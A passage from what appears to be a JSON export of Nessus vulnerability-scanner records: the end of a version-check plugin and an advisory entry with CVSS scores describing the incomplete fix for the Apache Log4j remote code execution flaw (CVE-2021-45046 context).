< 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info['version'], port);\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T21:40:57", "description": "The version of Apache Log4j on the remote host is 2.x < 2.12.2 / 2.16.0. It is, therefore, affected by a remote code execution vulnerability. The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "Apache Log4